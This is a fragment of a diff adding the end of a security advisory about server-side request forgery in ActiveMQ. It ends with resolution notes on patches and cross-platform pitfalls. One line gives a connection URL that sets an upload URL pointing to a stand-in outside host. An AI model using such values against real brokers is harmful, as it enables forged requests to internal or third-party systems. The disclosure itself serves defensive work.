+tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com
+
+An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.
+
+Resolution
+
+The ActiveMQ project has released an advisory and patches.
+This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind.
+It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.
\ No newline at end of file